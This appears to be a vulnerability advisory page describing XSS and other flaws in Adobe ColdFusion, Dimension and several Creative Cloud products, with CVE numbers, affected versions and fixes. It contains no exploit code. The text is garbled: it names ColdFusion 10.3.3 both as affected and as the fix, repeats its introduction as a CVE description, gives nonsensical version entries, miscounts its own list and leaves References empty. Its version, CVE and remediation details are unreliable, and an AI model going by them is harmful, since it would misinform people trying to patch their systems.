An attacker could leverage social engineering or email spoofing to interact with a user and convince them to open the malicious file.

CVE Solution: Update to version 3.4.5 of Adobe Dimension.

Adobe ColdFusion versions 10.3.3, 10.3.0 and CF10.0 are affected by an XSS flaw that could be exploited by hackers to execute arbitrary code on the system of users.

CVE Solution: Update to version 10.3.3 of Adobe ColdFusion.

Adobe Creative Cloud versions are multiple products are vulnerable to one or more XSS issues including the following:
INTRODUCTION: Adobe Creative Cloud (ACC) services allow users to access a wide range of creative tools and content from a single, secure login. These include services such as InDesign, Photoshop, Illustrator, and others. As such, Creative Cloud users are often in situations where they are required to share information via a public medium, such as a blog, or via email. As such, Creative Cloud users are often in situations where they are required to share information via a public medium, such as a blog, or via email. XSS is one of the most common forms of cross-site scripting, where data is unintentionally sent across a site via a mechanism other than the intended one, often due to insufficient input validation.

Overview: Adobe Creative Cloud Multiple XSS Vulnerabilities

According to the Adobe Creative Cloud advisory, multiple XSS vulnerabilities exist in a range of Creative Cloud products. These vulnerabilities allow attackers to inject malicious scripts into these products, which could lead to user data extraction and privilege escalation.
The following table provides information about the affected products and their current versions:
Product Affected Version
InDesign CS6 11.4.2
InDesign CC 2015.1.0
Illustrator CC 2015.1.0
Photoshop CC 2015.1.0
Photoshop CC 2014 16-bit 18-bit 20-bit
Photoshop CS6 12.3

Adobe Creative Cloud: Multiple XSS Vulnerabilities

Adobe Creative Cloud services are vulnerable to multiple XSS vulnerabilities, including:
- CVE-2018-8059: Adobe Creative Cloud (ACC) services allow users to access a wide range of creative tools and content from a single, secure login. These include services such as InDesign, Photoshop, Illustrator, and others. As such, Creative Cloud users are often in situations where they are required to share information via a public medium, such as a blog or via email. XSS is one of the most common forms of cross-site scripting.
- CVE-2019-14596: The page contains an XSS vulnerability that could lead to remote code execution on affected systems.
- CVE-2019-14597: A bookmarklet vulnerability could lead to remote code execution on affected systems.
In addition to these two vulnerabilities, there is also an unauthenticated JSONP injection vulnerability affecting Adobe Creative Cloud (ACC) servers that could result in remote code execution on affected systems.

Adobe Creative Cloud Multiple Products

Vulnerable to XSS
The following Creative Cloud products are vulnerable to XSS:
Adobe InDesign
Adobe Photoshop
Adobe Illustrator
Adobe Acrobat Pro DC
Adobe Dreamweaver CC

Adobe Creative Cloud Service XSS Vulnerabilities

The following Creative Cloud products are vulnerable to one or more XSS issues and can be exploited by an attacker to hijack the session of a user.
- InDesign
- Photoshop
- Illustrator
- Acrobat Pro DC
- Acrobat Pro DC (Acrobat Pro)

Stanford University Multiple Vulnerabilities

Earlier this month, Stanford University reported a total of 18 vulnerabilities in the Adobe Creative Cloud platform which includes the following:
- A cross-site scripting (XSS) vulnerability that could be exploited by attackers to execute arbitrary code on a user's computer.
- An information leak vulnerability that could reveal information about the system running Adobe Creative Cloud.
- Multiple SQL injection flaws that could allow attackers to steal sensitive data from users accounts.
- Multiple remote code execution flaws that could allow attackers to take control of systems running Adobe Creative Cloud and potentially exploit them.

Timeline

Published on: 10/14/2022 20:15:00 UTC
Last modified on: 10/18/2022 17:41:00 UTC

References